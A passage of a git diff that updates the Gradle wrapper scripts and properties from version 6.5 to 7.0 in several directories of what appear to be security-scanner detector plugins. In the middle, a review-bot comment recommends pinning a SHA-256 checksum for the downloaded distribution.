+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/examples/example_vuln_detector/gradlew.bat b/examples/example_vuln_detector/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/examples/example_vuln_detector/gradlew.bat +++ b/examples/example_vuln_detector/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/credentials/cve20177615/gradlew b/google/detectors/credentials/cve20177615/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/credentials/cve20177615/gradlew +++ b/google/detectors/credentials/cve20177615/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
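Review bot: The new `distributionUrl` for gradle-7.0-bin.zip has no `distributionSha256Sum` next to it, so the wrapper will unpack and run whatever archive that URL returns; `validateDistributionUrl=true` concerns the URL and, as far as I can tell, not the archive contents. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip, taken from Gradle's published release checksums>` below the URL. The same applies to the identical gradle-wrapper.properties hunk for generic_weak_credential_detector further down. The accompanying gradle-wrapper.jar is replaced as an opaque binary in this commit, so its checksum should be compared with the one Gradle publishes for that wrapper version before merging.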
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/credentials/cve20177615/gradlew.bat b/google/detectors/credentials/cve20177615/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/credentials/cve20177615/gradlew.bat +++ b/google/detectors/credentials/cve20177615/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradlew b/google/detectors/credentials/generic_weak_credential_detector/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/credentials/generic_weak_credential_detector/gradlew +++ b/google/detectors/credentials/generic_weak_credential_detector/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" 